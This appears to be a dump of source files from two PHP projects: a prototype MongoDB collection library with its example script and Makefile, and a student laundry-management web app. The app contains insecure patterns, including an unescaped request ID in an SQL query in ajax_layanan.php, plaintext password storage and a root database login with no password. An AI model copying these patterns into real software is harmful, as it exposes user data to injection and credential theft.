* NOTE: Will update at most ONE document matching $filter
*
* @see http://docs.mongodb.org/manual/reference/command/update/
* @see Collection::getWriteOptions() for supported $options
*
* @param array $filter The document to be replaced
* @param array $update An array of update operators to apply to the document
* @param array $options Additional options
* @return UpdateResult
*/
public function updateOne(array $filter, array $update, array $options = array())
{
$firstKey = key($update);
if (!isset($firstKey[0]) || $firstKey[0] != '$') {
throw new InvalidArgumentException("First key in \$update must be a \$operator");
}
$wr = $this->_update($filter, $update, $options + array("multi" => false));
return new UpdateResult($wr);
}
/**
* Helper to build a Query object
*
* @param array $filter the query document
* @param array $options query/protocol options
* @return Query
* @internal
*/
final protected function _buildQuery($filter, $options)
{
if ($options["comment"]) {
$options["modifiers"]['$comment'] = $options["comment"];
}
if ($options["maxTimeMS"]) {
$options["modifiers"]['$maxTimeMS'] = $options["maxTimeMS"];
}
if ($options["sort"]) {
$options['$orderby'] = $options["sort"];
}
$flags = $this->_opQueryFlags($options);
$options["cursorFlags"] = $flags;
$query = new Query($filter, $options);
return $query;
}
/**
* Internal helper for delete one/many documents
* @internal
*/
final protected function _delete($filter, $limit = 1)
{
$options = array_merge($this->getWriteOptions(), array("limit" => $limit));
$bulk = new BulkWrite($options["ordered"]);
$bulk->delete($filter, $options);
return $this->manager->executeBulkWrite($this->ns, $bulk, $this->wc);
}
/**
* Internal helper for throwing an exception with error message
* @internal
*/
final protected function _generateCommandException($doc)
{
if ($doc["errmsg"]) {
return new RuntimeException($doc["errmsg"]);
}
var_dump($doc);
return new RuntimeException("FIXME: Unknown error");
}
/**
* Internal helper for massaging aggregate options
* @internal
*/
protected function _massageAggregateOptions($options)
{
if ( ! empty($options["useCursor"])) {
$options["cursor"] = isset($options["batchSize"])
? array("batchSize" => (integer) $options["batchSize"])
: new stdClass;
}
unset($options["useCursor"], $options["batchSize"]);
return $options;
}
/**
* Internal helper for massaging findandmodify options
* @internal
*/
final protected function _massageFindAndModifyOptions($options, $update = array())
{
$ret = array(
"sort" => $options["sort"],
"new" => isset($options["returnDocument"]) ? $options["returnDocument"] == self::FIND_ONE_AND_RETURN_AFTER : false,
"fields" => $options["projection"],
"upsert" => isset($options["upsert"]) ? $options["upsert"] : false,
);
if ($update) {
$ret["update"] = $update;
} else {
$ret["remove"] = true;
}
return $ret;
}
/**
* Internal helper for massaging the findAndModify result.
*
* @internal
* @param array $result
* @param array $options
* @return array|null
*/
final protected function _massageFindAndModifyResult(array $result, array $options)
{
if ($result['value'] === null) {
return null;
}
/* Prior to 3.0, findAndModify returns an empty document instead of null
* when an upsert is performed and the pre-modified document was
* requested.
*/
if ($options['upsert'] && ! $options['new'] &&
isset($result['lastErrorObject']->updatedExisting) &&
! $result['lastErrorObject']->updatedExisting) {
return null;
}
return is_object($result["value"])
? (array) $result['value']
: $result['value'];
}
/**
* Constructs the Query Wire Protocol field 'flags' based on $options
* provided to other helpers
*
* @param array $options
* @return integer OP_QUERY Wire Protocol flags
* @internal
*/
final protected function _opQueryFlags($options)
{
$flags = 0;
$flags |= $options["allowPartialResults"] ? self::QUERY_FLAG_PARTIAL : 0;
$flags |= $options["cursorType"] ? $options["cursorType"] : 0;
$flags |= $options["oplogReplay"] ? self::QUERY_FLAG_OPLOG_REPLY: 0;
$flags |= $options["noCursorTimeout"] ? self::QUERY_FLAG_NO_CURSOR_TIMEOUT : 0;
return $flags;
}
/**
* Internal helper for running a command
* @internal
*/
final protected function _runCommand($dbname, array $cmd, ReadPreference $rp = null)
{
//var_dump(\BSON\toJSON(\BSON\fromArray($cmd)));
$command = new Command($cmd);
return $this->manager->executeCommand($dbname, $command, $rp);
}
/**
* Internal helper for replacing/updating one/many documents
* @internal
*/
protected function _update($filter, $update, $options)
{
$options = array_merge($this->getWriteOptions(), $options);
$bulk = new BulkWrite($options["ordered"]);
$bulk->update($filter, $update, $options);
return $this->manager->executeBulkWrite($this->ns, $bulk, $this->wc);
}
/**
* Create one or more indexes for the collection using the createIndexes
* command.
*
* @param Server $server
* @param IndexInput[] $indexes
* @return string[] The names of the created indexes
*/
private function createIndexesCommand(Server $server, array $indexes)
{
$command = new Command(array(
'createIndexes' => $this->collname,
'indexes' => $indexes,
));
$server->executeCommand($this->dbname, $command);
return array_map(function(IndexInput $index) { return (string) $index; }, $indexes);
}
/**
* Create one or more indexes for the collection by inserting into the
* "system.indexes" collection (MongoDB <2.6).
*
* @param Server $server
* @param IndexInput[] $indexes
* @return string[] The names of the created indexes
*/
private function createIndexesLegacy(Server $server, array $indexes)
{
$bulk = new BulkWrite(true);
foreach ($indexes as $index) {
// TODO: Remove this once PHPC-274 is resolved (see: PHPLIB-87)
$bulk->insert($index->bsonSerialize());
}
$server->executeBulkWrite($this->dbname . '.system.indexes', $bulk);
return array_map(function(IndexInput $index) { return (string) $index; }, $indexes);
}
/**
* Returns information for all indexes for this collection using the
* listIndexes command.
*
* @see http://docs.mongodb.org/manual/reference/command/listIndexes/
* @param Server $server
* @return IndexInfoIteratorIterator
*/
private function listIndexesCommand(Server $server)
{
$command = new Command(array('listIndexes' => $this->collname));
$cursor = $server->executeCommand($this->dbname, $command);
$cursor->setTypeMap(array('document' => 'array'));
return new IndexInfoIteratorIterator($cursor);
}
/**
* Returns information for all indexes for this collection by querying the
* "system.indexes" collection (MongoDB <2.8).
*
* @param Server $server
* @return IndexInfoIteratorIterator
*/
private function listIndexesLegacy(Server $server)
{
$query = new Query(array('ns' => $this->ns));
$cursor = $server->executeQuery($this->dbname . '.system.indexes', $query);
$cursor->setTypeMap(array('document' => 'array'));
return new IndexInfoIteratorIterator($cursor);
}
}
<file_sep><?php
namespace MongoDB\Exception;
class UnexpectedValueException extends \UnexpectedValueException implements Exception
{
}
<file_sep><?php
require __DIR__ . "/../src/QueryFlags.php";
require __DIR__ . "/../src/CursorType.php";
require __DIR__ . "/../src/InsertResult.php";
require __DIR__ . "/../src/DeleteResult.php";
require __DIR__ . "/../src/UpdateResult.php";
require __DIR__ . "/../src/Collection.php";
$manager = new MongoDB\Manager("mongodb://localhost:27017");
$collection = new MongoDB\Collection($manager, "crud.examples");
$hannes = array(
"name" => "Hannes",
"nick" => "bjori",
"citizen" => "Iceland",
);
$hayley = array(
"name" => "Hayley",
"nick" => "Ninja",
"citizen" => "USA",
);
$bobby = array(
"name" => "<NAME>",
"nick" => "<NAME>",
"citizen" => "USA",
);
$kasparov = array(
"name" => "<NAME>",
"nick" => "Kasparov",
"citizen" => "Russia",
);
$spassky = array(
"name" => "<NAME>",
"nick" => "Spassky",
"citizen" => "France",
);
try {
$result = $collection->insertOne($hannes);
printf("Inserted _id: %s\n", $result->getInsertedId());
$result = $collection->insertOne($hayley);
printf("Inserted _id: %s\n", $result->getInsertedId());
$result = $collection->insertOne($bobby);
printf("Inserted _id: %s\n", $result->getInsertedId());
$count = $collection->count(array("nick" => "bjori"));
printf("Searching for nick => bjori, should have only one result: %d\n", $count);
$result = $collection->updateOne(
array("citizen" => "USA"),
array('$set' => array("citizen" => "Iceland"))
);
printf("Updated: %s (out of expected 1)\n", $result->getModifiedCount());
$result = $collection->find(array("citizen" => "Iceland"), array("comment" => "Excellent query"));
echo "Searching for citizen => Iceland, verify Hayley is now Icelandic\n";
foreach($result as $document) {
var_dump($document);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
try {
$result = $collection->find();
echo "Find all docs, should be 3, verify 1x USA citizen, 2x Icelandic\n";
foreach($result as $document) {
var_dump($document);
}
$result = $collection->distinct("citizen");
echo "Distinct countries:\n";
var_dump($result);
echo "aggregate\n";
$aggregate = $collection->aggregate(array(array('$project' => array("name" => 1, "_id" => 0))), array("useCursor" => true, "batchSize" => 2));
printf("Should be 3 different people\n");
foreach($aggregate as $person) {
var_dump($person);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
try {
$result = $collection->updateMany(
array("citizen" => "Iceland"),
array('$set' => array("viking" => true))
);
printf("Updated: %d (out of expected 2), verify Icelandic people are vikings\n", $result->getModifiedCount());
$result = $collection->find();
foreach($result as $document) {
var_dump($document);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
try {
echo "This is the trouble maker\n";
$result = $collection->replaceOne(
array("nick" => "<NAME>"),
array("name" => "<NAME>", "nick" => "unknown", "citizen" => "Norway")
);
printf("Replaced: %d (out of expected 1), verify Bobby has been replaced with Magnus\n", $result->getModifiedCount());
$result = $collection->find();
foreach($result as $document) {
var_dump($document);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
try {
$result = $collection->deleteOne($document);
printf("Deleted: %d (out of expected 1)\n", $result->getDeletedCount());
$result = $collection->deleteMany(array("citizen" => "Iceland"));
printf("Deleted: %d (out of expected 2)\n", $result->getDeletedCount());
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
try {
echo "FindOneAndReplace\n";
$result = $collection->findOneAndReplace($spassky, $kasparov, array("upsert" => true));
echo "Kasparov\n";
var_dump($result);
echo "Returning the old document where he was Russian\n";
$result = $collection->findOneAndUpdate($kasparov, array('$set' => array("citizen" => "Croatia")));
var_dump($result);
echo "Deleting him, he isn't Croatian just yet\n";
$result = $collection->findOneAndDelete(array("citizen" => "Croatia"));
var_dump($result);
echo "This should be empty\n";
$result = $collection->find(array());
foreach($result as $document) {
var_dump($document);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
exit;
}
try {
$result = $collection->bulkWrite(
// Required writes param (an array of operations)
[
// Like explain(), operations identified by single key
[
'insertOne' => [
['x' => 1]
],
],
[
'updateMany' => [
['x' => 1],
['$set' => ['x' => 2]],
],
],
[
'updateOne' => [
['x' => 3],
['$set' => ['x' => 4]],
// Optional params are still permitted
['upsert' => true],
],
],
[
'deleteOne' => [
['x' => 1],
],
],
[
'deleteMany' => [
// Required arguments must still be specified
[],
],
],
],
// Optional named params in an associative array
['ordered' => false]
);
printf("insertedCount: %d\n", $result->getInsertedCount());
printf("matchedCount: %d\n", $result->getMatchedCount());
printf("modifiedCount: %d\n", $result->getModifiedCount());
printf("upsertedCount: %d\n", $result->getUpsertedCount());
printf("deletedCount: %d\n", $result->getDeletedCount());
foreach ($result->getUpsertedIds() as $index => $id) {
printf("upsertedId[%d]: %s", $index, $id);
}
} catch(Exception $e) {
printf("Caught exception '%s', on line %d\n", $e->getMessage(), __LINE__);
echo $e->getTraceAsString(), "\n";
exit;
}
<file_sep>.PHONY: apigen composer test docs mkdocs
MONGODB_LIB_VERSION=`php -r 'require "src/Collection.php"; echo MongoDB\Collection::VERSION, "\n";'`
COMPOSER_ARGS=update --no-interaction --prefer-source
PHPUNIT_ARGS=--process-isolation
composer:
@command -v composer >/dev/null 2>&1; \
if test $$? -eq 0; then \
composer $(COMPOSER_ARGS) ;\
elif test -r composer.phar; then \
php composer.phar $(COMPOSER_ARGS); \
else \
echo "Cannot find composer :("; \
echo "Aborting."; \
exit 1; \
fi
test: composer
@command -v phpunit >/dev/null 2>&1; \
if test $$? -eq 0; then \
phpunit $(PHPUNIT_ARGS) ;\
elif test -r phpunit.phar; then \
php phpunit.phar $(PHPUNIT_ARGS); \
else \
echo "Cannot find phpunit :("; \
echo "Aborting."; \
exit 1; \
fi
apigen:
@command -v apigen >/dev/null 2>&1; \
if test $$? -eq 0; then \
apigen generate
elif test -r apigen.phar; then \
php apigen.phar generate \
else \
echo "Cannot find apigen :("; \
echo "Aborting."; \
exit 1; \
fi
mkdocs:
@command -v mkdocs >/dev/null 2>&1; \
if test $$? -eq 0; then \
mkdocs build --clean \
else \
echo "Cannot find mkdocs :("; \
echo "Aborting."; \
exit 1; \
fi
docs-api: apigen
docs: mkdocs
release: test RELEASE
@echo "Please run:"
@echo " " git add RELEASE-$(MONGODB_LIB_VERSION)
@echo " " git commit -m \"Add $(MONGODB_LIB_VERSION) release notes\"
@echo " " git tag -a -m \"Release MongoDB library $(MONGODB_LIB_VERSION)\" $(MONGODB_LIB_VERSION)
@echo " " git push --tags
@echo " " make release-docs
@echo "And don't forget to bump version in src/Collection.php"
docs:
mkdocs build --clean
release-docs: docs
mkdocs gh-deploy --clean
RELEASE:
@git log --pretty=format:"%ad %an <%ae>%n%x09* %s%n" --date short --since="$$(git show -s --format=%ad `git rev-list --tags --max-count=1`)" > RELEASE-$(MONGODB_LIB_VERSION)
<file_sep><?php
namespace MongoDB\Exception;
class InvalidArgumentException extends \InvalidArgumentException implements Exception
{
}
<file_sep><?php
namespace MongoDB\Exception;
interface Exception
{
}
| 2dbb3e8320521c0dcd54ec6937c397941fcc95b6 | [
"Markdown",
"Makefile",
"PHP"
] | 9 | PHP | jaleelzhang/mongo-php-library-prototype | 8665a88962f989d3aa3412b4a196092d32d64f62 | 4e6a81b45fa163ee415c08129b1949b2fd2e815e |
refs/heads/master | <repo_name>alaraiabdiallah/tubes_rpl<file_sep>/src/konsumen.php
<?php
redirectWhenGuest('login.php');
$konsumen = [];
$konsumenQuery = $db->query("SELECT * FROM konsumen ;");
while($r = $konsumenQuery->fetch_object())
$konsumen[] = $r;
$nama = $db->escape_string(postReq('nama'));
$no_hp = $db->escape_string(postReq('no_hp'));
if(isEdit()){
$id = $db->escape_string(getReq('id'));
$konsumen = $db->query("SELECT * FROM konsumen WHERE id = '$id';")->fetch_object();
$nama = $db->escape_string(postReq('nama',$konsumen->nama));
$no_hp = $db->escape_string(postReq('no_hp',$konsumen->no_hp));
}
if(isDelete()){
$id = $db->escape_string(getReq('id'));
$db->query("DELETE FROM konsumen WHERE id = '$id';");
header('location: konsumen.php');
}
if(isButtonSubmit()){
if(isEdit())
$db->query("UPDATE konsumen SET nama = '$nama', no_hp = '$no_hp' WHERE id = '$id';");
if(isAdd())
$db->query("INSERT konsumen(nama, no_hp) VALUES('$nama','$no_hp');");
header('location: konsumen.php');
}
?><file_sep>/pegawai.php
<?php
require_once "lib/bootstrap.php";
require_once "src/pegawai.php";
if(isAdd() || isEdit())
require_once "views/form_pegawai.php";
else
require_once "views/pegawai.php";
?><file_sep>/src/login.php
<?php
require_once "lib/bootstrap.php";
redirectWhenAuthenticated("index.php");
if(isButtonSubmit()){
try{
$username = $db->escape_string(postReq('username'));
$password = $db->escape_string(postReq('password'));
$query = $db->query("SELECT * FROM user_login INNER JOIN pegawai ON user_login.pegawai_id = pegawai.id WHERE username = '$username' AND password = '$<PASSWORD>' ");
$result = $query->fetch_object();
if($query->num_rows != 1)
throw new Exception("Username dan password salah");
setUser($result);
$redirect = isset($_GET['from']) ? $_GET['from'] : "index.php";
header("location: $redirect");
}catch(Exception $e){
$errors['auth'] = $e->getMessage();
}
}
?><file_sep>/views/login.php
<?php require_once "partials/header.php" ?>
<div class="col-4" style="margin: 10% auto;">
<div class="card">
<div class="card-body">
<h3 class="text-center">Login your account</h3>
<hr>
<form action="<?php echo getCurrentUrl() ?>" method="POST">
<div class="form-group">
<label for="username">Username</label>
<input type="text" required class="form-control" name="username" id="username" aria-describedby="username" placeholder="Your username">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Password</label>
<input type="<PASSWORD>" required class="form-control" name="password" id="password" placeholder="*******">
</div>
<button type="submit" name="submit" class="btn btn-primary">Login</button>
</form>
<hr>
</div>
</div>
</div>
<?php require_once "partials/footer.php" ?><file_sep>/login.php
<?php
require_once "src/login.php";
require_once "views/login.php";
?><file_sep>/index.php
<?php
require_once "lib/bootstrap.php";
require_once "src/home.php";
require_once "views/home.php";
?><file_sep>/lib/db.php
<?php
$servername = "localhost";
$username = "root";
$password = "";
$dbname = "rpl_laundry";
$db = new mysqli($servername,$username,$password,$dbname);
function fetchToArray($query){
$data = [];
while($row = $query->fetch_object()) $data[] = $row;
return $data;
}
function DBInsert($db,$data, $table, $except = 'id'){
$columns = [];
$values = [];
foreach($data as $column => $value){
if($column == $except) continue;
$columns[] = $column;
$values[] = "'".$db->escape_string($value)."'";
}
$sql = "INSERT INTO $table(". implode(',',$columns) .") VALUES (".implode(',',$values).");";
$query = $db->query($sql);
return $query;
}
function DBUpdate($db,$data, $table, $primaryKey = 'id'){
$whitelist = [];
foreach($data as $column => $value){
if($column == $primaryKey) continue;
$whitelist[] = $column."='".$db->escape_string($value)."'";
}
$sql = "UPDATE $table SET ".implode(',',$whitelist)." WHERE $primaryKey = '".$data[$primaryKey]."';";
$query = $db->query($sql);
return $query;
}
function DBDelete($db, $value, $table, $primaryKey = 'id'){
$value = $db->escape_string($value);
return $db->query("DELETE FROM $table WHERE $primaryKey = '$value';");
}<file_sep>/ajax_layanan.php
<?php
require_once "lib/bootstrap.php";
$id = getReq("id");
$queryLayanan = $db->query("SELECT * FROM layanan WHERE id='$id' ");
$row = $queryLayanan->fetch_object();
header('Content-Type: application/json');
echo json_encode([
"id" => $row->id,
"nama" => $row->nama,
"harga" => $row->harga,
"satuan" => $row->satuan,
]);
?><file_sep>/views/home.php
<?php
require_once "partials/header.php";
require_once "partials/navbar.php";
?>
<br />
<div class="container">
<div class="row">
<div class="col-2 col-lg-2 col-md-2 no-padding my-menu">
<?php require_once "partials/menu.php"; ?>
</div>
<div class="col-10 col-lg-10 col-md-10 my-content">
Beranda
</div>
</div>
</div>
<?php require_once "partials/footer.php"; ?><file_sep>/lib/cart_lib.php
<?php
$_SESSION['carts'] = $_SESSION['carts'] ?? [];
function isCartItemExists($id){
foreach($_SESSION['carts'] as $cart){
if($cart['id'] && $cart['id'] == $id) return true;
}
return false;
}
function searchCartItemById($id){
$i = 0;
foreach($_SESSION['carts'] as $cart){
if($cart['id'] && $cart['id'] == $id) return $i;
$i++;
}
return null;
}
function getCart($id){
$index = searchCartItemById($id);
return $_SESSION['carts'][$index];
}
function updateCartQty($id,$qty){
$index = searchCartItemById($id);
$_SESSION['carts'][$index]['qty'] = $qty;
}
function deleteCartItem($id){
$index = searchCartItemById($id);
unset($_SESSION['carts'][$index]);
}
function addCartItem($data){
array_push($_SESSION['carts'],$data);
}
function getCarts(){
return $_SESSION['carts'];
}
function cartsTotal(){
$total = 0;
foreach($_SESSION['carts'] as $cart)
$total += ($cart['qty'] * $cart['price']);
return $total;
}<file_sep>/views/konsumen.php
<?php
require_once "partials/header.php";
require_once "partials/navbar.php";
?>
<br />
<div class="container">
<div class="row">
<div class="col-2 col-lg-2 col-md-2 no-padding my-menu">
<?php require_once "partials/menu.php"; ?>
</div>
<div class="col-10 col-lg-10 col-md-10 my-content">
<div class="pull-right space-bottom">
<a class="btn btn-primary" href="?action=add" role="button"><i class="fa fa-plus"></i></a>
</div>
<table class="table">
<thead>
<tr>
<th>No</th>
<th>Nama</th>
<th>No HP</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<?php $i = 1; foreach($konsumen as $r): ?>
<tr>
<td scope="row"><?php echo $i++; ?></td>
<td><?php echo $r->nama; ?></td>
<td><?php echo $r->no_hp; ?></td>
<td>
<a class="btn btn-primary btn-sm" href="?id=<?php echo $r->id ?>&action=edit" role="button"><i class="fa fa-edit"></i> Edit</a>
<a class="btn btn-danger btn-sm" href="?id=<?php echo $r->id ?>&action=delete" role="button" onclick="return confirm('Yakin akan menghapus data ini?')"><i class="fa fa-trash"></i> Delete</a>
</td>
</tr>
<?php endforeach ?>
</tbody>
</table>
</div>
</div>
</div>
<?php require_once "partials/footer.php"; ?><file_sep>/lib/url.php
<?php
function getCurrentUrl(){
if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on')
$link = "https";
else
$link = "http";
$link .= "://";
$link .= $_SERVER['HTTP_HOST'];
$link .= $_SERVER['REQUEST_URI'];
return $link;
}
function currScript(){
$scriptArr = explode("/",$_SERVER['SCRIPT_NAME']);
return $scriptArr[count($scriptArr) - 1];
}
?><file_sep>/transaksi.php
<?php
require_once "lib/bootstrap.php";
require_once "src/transaksi.php";
if(isAdd())
require_once "views/form_transaksi.php";
else if(isEdit())
require_once "views/form_edit_transaksi.php";
else
require_once "views/transaksi.php";
?><file_sep>/src/transaksi.php
<?php
redirectWhenGuest('login.php');
$transaksi = [];
$transaksiQuery = $db->query("SELECT * FROM transaksi ;");
while($r = $transaksiQuery->fetch_object())$transaksi[] = $r;
$konsumen = [];
$konsumenQuery = $db->query("SELECT * FROM konsumen ;");
while($r = $konsumenQuery->fetch_object())$konsumen[] = $r;
$layanan = [];
$layananQuery = $db->query("SELECT * FROM layanan ;");
while($r = $layananQuery->fetch_object()) $layanan[] = $r;
$default_details = [
[
"layanan_id" => "",
"satuan" => "",
"harga" => "",
"jumlah" => 0
],
];
$pegawai_id = getUserInfo("pegawai_id");
$konsumen_id = $db->escape_string(postReq("konsumen_id"));
$tanggal_transaksi = $db->escape_string(postReq('tanggal_transaksi',date('Y-m-d')));
$details = postReq('details',$default_details);
if(isEdit()){
$id = $db->escape_string(getReq('id'));
$transaksi = $db->query("SELECT * FROM transaksi WHERE kode_transaksi = '$id';")->fetch_object();
$tanggal_ambil = formatDate($transaksi->tanggal_ambil) == "-" ? date("Y-m-d") : date("Y-m-d",strtotime($transaksi->tanggal_ambil));
$tanggal_ambil = $db->escape_string(postReq('tanggal_ambil',$tanggal_ambil));
$status = $db->escape_string(postReq('status',$transaksi->status));
$statuses = [1,2,3];
}
if(isButtonSubmit()){
if(isEdit()){
$id = $db->escape_string(getReq('id'));
$db->query("UPDATE transaksi SET tanggal_ambil = '$tanggal_ambil', status = '$status' WHERE kode_transaksi = '$id';");
header("location: transaksi.php");
}
if(isAdd()){
try{
$code = "TRX-".substr(md5(date('ymdhisa').$user_id),0,10);
$db->begin_transaction(MYSQLI_TRANS_START_READ_WRITE);
$total = 0;
foreach($details as $detail)
$total += ($detail['jumlah'] * $detail['harga']);
$transaksiQuery = $db->query("INSERT transaksi(kode_transaksi, konsumen_id,pegawai_id,tanggal_transaksi,total)
VALUES('$code','$konsumen_id', '$pegawai_id','$tanggal_transaksi','$total');
");
$last_id = $db->insert_id;
if(!$transaksiQuery)
throw new Exception("Insert transaksi Failed");
$values = [];
foreach($details as $detail)
$values[] = "(NULL, '$code', '".$detail['layanan_id']."', '".$detail['jumlah']."')";
$transaksiDetailQuery = $db->query("INSERT detail_transaksi VALUES ".implode(',',$values).";");
if(!$transaksiDetailQuery)
throw new Exception("Insert detail transaksi failed");
$db->commit();
header('location: transaksi.php');
}catch(Exception $e){
$db->rollback();
$error['query'] = $e->getMessage();
header('location: transaksi.php?action=add');
}
}
}
?><file_sep>/konsumen.php
<?php
require_once "lib/bootstrap.php";
require_once "src/konsumen.php";
if(isAdd() || isEdit())
require_once "views/form_konsumen.php";
else
require_once "views/konsumen.php";
?><file_sep>/README.md
# Tubes RPL <file_sep>/lib/format.php
<?php
function numberFormatID($value){
return number_format($value,0,',','.');
}
function currencyID($value){
return "Rp. ".numberFormatID($value);
}
function formatDate($date){
if(is_null($date) || empty($date) || $date == "0000-00-00" || $date == "0000-00-00 00:00:00")
return "-";
return date("d F Y",strtotime($date));
}
function statusTrasaction($status){
switch($status){
case 1:
return "On Progress";
case 2:
return "Ready Pickup";
case 3:
return "Complete";
}
}<file_sep>/src/pegawai.php
<?php
redirectWhenGuest('login.php');
$pegawai = [];
$pegawaiQuery = $db->query("SELECT * FROM user_login INNER JOIN pegawai ON user_login.pegawai_id = pegawai.id;");
while($r = $pegawaiQuery->fetch_object())
$pegawai[] = $r;
$nama = $db->escape_string(postReq('nama'));
$username = $db->escape_string(postReq('username'));
$password = $db->escape_string(postReq('password'));
$no_hp = $db->escape_string(postReq('no_hp'));
if(isEdit()){
$id = $db->escape_string(getReq('id'));
$pegawai = $db->query("SELECT * FROM user_login INNER JOIN pegawai ON user_login.pegawai_id = pegawai.id WHERE pegawai.id = '$id';")->fetch_object();
$nama = $db->escape_string(postReq('nama',$pegawai->nama));
$username = $db->escape_string(postReq('username',$pegawai->username));
$password = $db->escape_string(postReq('password'));
$no_hp = $db->escape_string(postReq('no_hp',$pegawai->no_hp));
}
if(isDelete()){
$id = $db->escape_string(getReq('id'));
$db->query("DELETE FROM pegawai WHERE id = '$id';");
$db->query("DELETE FROM user_login WHERE pegawai_id = '$id';");
header('location: pegawai.php');
}
if(isButtonSubmit()){
if(isEdit()){
$db->query("UPDATE pegawai SET nama = '$nama', no_hp = '$no_hp' WHERE id = '$id';");
if(empty($password))
$db->query("UPDATE user_login SET username = '$username' WHERE pegawai_id = '$id';");
else
$db->query("UPDATE user_login SET username = '$username', password = '$<PASSWORD>' WHERE pegawai_id = '$id';");
}
if(isAdd()){
$db->query("INSERT pegawai(nama, no_hp) VALUES('$nama','$no_hp');");
$db->query("INSERT user_login(username, password, pegawai_id) VALUES('$username','$password',LAST_INSERT_ID());");
}
header('location: pegawai.php');
}
?><file_sep>/layanan.php
<?php
require_once "lib/bootstrap.php";
require_once "src/layanan.php";
if(isAdd() || isEdit())
require_once "views/form_layanan.php";
else
require_once "views/layanan.php";
?><file_sep>/assets/js/main.js
var layanan_field_html = '';
for(let lay of layanan){
layanan_field_html += `
<option value="${lay.id}">${lay.nama}</option>
`;
}
function addNewRow(){
let r = Math.random().toString(36).substring(7);
let trx_row = `
<div class="row" id="row-${r}">
<input type="hidden" class="harga-hidden" name="details[${r}][harga]">
<div class="col-lg-6">
<div class="form-group">
<label for="layanan_id">Konsumen</label>
<select class="form-control service-form" name="details[${r}][layanan_id]" id="layanan_id" onchange="selectService('${r}',this.value)">
<option value="">--PILIH Layanan--</option>
${layanan_field_html}
</select>
</div>
</div>
<div class="col-lg-3">
<div class="form-group">
<label for="jumlah">Jumlah</label>
<input type="number" required class="form-control qty-form" name="details[${r}][jumlah]" id="jumlah">
</div>
</div>
<div class="col-lg-1" style="margin-top: 40px;">
<span class="satuan"></span>
</div>
<div class="col-lg-2" style="margin-top: 35px;">
<button type="button" class="btn btn-danger btn-sm" onclick="deleteRow('#row-${r}')"><i class="fa fa-trash"></i></button>
</div>
</div>
`;
$("#trx_details").append(trx_row);
}
function deleteRow(selector){
$(selector).remove();
}
function selectService(rowid,value){
let rowSelector = '#row-'+rowid;
$(rowSelector).find('.satuan').text("")
$(rowSelector).find('.qty-form').val("");
$(rowSelector).find('.harga-hidden').val("");
if(value != ""){
fetch(`ajax_layanan.php?id=${value}`)
.then(res => res.json())
.then((res) => {
$(rowSelector).find('.satuan').text(`Rp. ${res.harga}/${res.satuan}`)
$(rowSelector).find('.qty-form').val(1);
$(rowSelector).find('.harga-hidden').val(res.harga);
})
.catch(console.error)
}
}<file_sep>/src/layanan.php
<?php
redirectWhenGuest('login.php');
$layanan = [];
$layananQuery = $db->query("SELECT * FROM layanan ;");
while($r = $layananQuery->fetch_object())
$layanan[] = $r;
$nama = $db->escape_string(postReq('nama'));
$harga = $db->escape_string(postReq('harga'));
$satuan = $db->escape_string(postReq('satuan'));
if(isEdit()){
$id = $db->escape_string(getReq('id'));
$layanan = $db->query("SELECT * FROM layanan WHERE id = '$id';")->fetch_object();
$nama = $db->escape_string(postReq('nama',$layanan->nama));
$harga = $db->escape_string(postReq('harga',$layanan->harga));
$satuan = $db->escape_string(postReq('satuan',$layanan->satuan));
}
if(isDelete()){
$id = $db->escape_string(getReq('id'));
$db->query("DELETE FROM layanan WHERE id = '$id';");
header('location: layanan.php');
}
if(isButtonSubmit()){
if(isEdit())
$db->query("UPDATE layanan SET nama = '$nama', satuan = '$satuan', harga = '$harga' WHERE id = '$id';");
if(isAdd())
$db->query("INSERT layanan(nama,harga,satuan) VALUES('$nama','$harga','$satuan');");
header('location: layanan.php');
}
?><file_sep>/views/form_transaksi.php
<?php
require_once "partials/header.php";
require_once "partials/navbar.php";
?>
<br />
<div class="container">
<div class="row">
<div class="col-2 col-lg-2 col-md-2 no-padding my-menu">
<?php require_once "partials/menu.php"; ?>
</div>
<div class="col-10 col-lg-10 col-md-10 my-content">
<h3 align="center"><?php echo isEdit()?"Edit": "Tambah" ?> Data Layanan</h3>
<form action="<?php echo getCurrentUrl() ?>" method="post">
<div class="form-group">
<label for="tanggal_transaksi">Tanggal Transaksi</label>
<input type="date" required class="form-control" name="tanggal_transaksi" id="tanggal_transaksi" value="<?php echo $tanggal_transaksi ?>">
</div>
<div class="form-group">
<label for="konsumen_id">Konsumen</label>
<select class="form-control" name="konsumen_id" id="konsumen_id">
<option value="">--PILIH KONSUMEN--</option>
<?php foreach($konsumen as $r): ?>
<option value="<?php echo $r->id ?>"><?php echo $r->nama ?> (<?php echo $r->no_hp ?>)</option>
<?php endforeach ?>
</select>
</div>
<div id="trx_details">
<div class="pull-right">
<button type="button" class="btn btn-primary btn-sm" onclick="addNewRow()"><i class="fa fa-plus"></i></button>
</div>
<div class="clearfix"></div>
<?php $i=0;foreach($details as $detail): ?>
<div class="row" id="row-<?php echo $i ?>">
<input type="hidden" class="harga-hidden" name="details[<?php echo $i; ?>][harga]">
<div class="col-lg-6">
<div class="form-group">
<label for="layanan_id">Layanan</label>
<select class="form-control service-form" name="details[<?php echo $i; ?>][layanan_id]" id="layanan_id" onchange="selectService('<?php echo $i?>',this.value)">
<option value="">--PILIH Layanan--</option>
<?php foreach($layanan as $r): ?>
<option value="<?php echo $r->id ?>" <?php echo $detail['layanan_id'] == $r->id ? 'selected' : '' ?>><?php echo $r->nama ?></option>
<?php endforeach ?>
</select>
</div>
</div>
<div class="col-lg-2">
<div class="form-group">
<label for="jumlah">Jumlah</label>
<input type="number" required class="form-control qty-form" name="details[<?php echo $i; ?>][jumlah]" id="jumlah">
</div>
</div>
<div class="col-lg-2" style="margin-top: 40px;">
<span class="satuan"><?php echo empty($detail['harga']) ? $detail['harga'] : "Rp.".$detail['harga']."/".$detail['satuan'] ?></span>
</div>
